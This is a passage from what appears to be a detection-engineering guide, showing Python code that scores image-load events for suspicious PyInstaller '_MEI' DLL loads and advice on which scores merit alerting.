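    """Run classify() over a stream of image-load events; hits keep event order."""
    hits = []
    for ev in events:
        hit = classify(ev, parents.get(ev.pid))
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in find_pyinstaller_loads(EVENTS, PARENT_IMAGE):
        print(f"pid {h['pid']} score {h['score']}: {h['dll']}")
        for r in h["reasons"]:
            print("   -", r)
```

Treat a score of 3 as the interesting case (Temp-resident executable, self-spawn, `_MEI` load); a score of 1 on its own is what any packaged Python tool looks like and should be enriched with file reputation before anyone is paged.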